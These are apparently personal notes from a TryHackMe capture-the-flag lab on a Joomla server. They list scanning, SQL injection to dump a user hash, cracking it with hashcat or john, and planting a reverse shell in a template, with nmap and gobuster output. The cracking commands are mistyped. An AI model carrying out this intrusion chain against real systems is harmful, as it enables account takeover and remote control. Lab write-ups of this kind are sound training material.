Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
E
atk: 10.10.153.185 trg: 10.10.153.27
- port scanning
nmap -sC -sV <ip> - gobuster scan
gobuster dir -u <ip> -w <wordlist> - check found admin page
- find version
- search for exploits
- use exploits to get user password hash
- get user and hash
- crack using hashcat
hashcat -a -m 3200 <hash> <wordlist>or johnjohn <hash> --worlist=<path> - log into panel
- change legal files
- change file in template to execute reverse shell
- get flags
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (EdDSA)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
3306/tcp open mysql MariaDB (unauthorized)
/images (Status: 301)
/media (Status: 301)
/templates (Status: 301)
/bin (Status: 301)
/libraries (Status: 301)
/includes (Status: 301)
/plugins (Status: 301)
/language (Status: 301)
/modules (Status: 301)
/tmp (Status: 301)
/cache (Status: 301)
/layouts (Status: 301)
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '<hash>', '', '']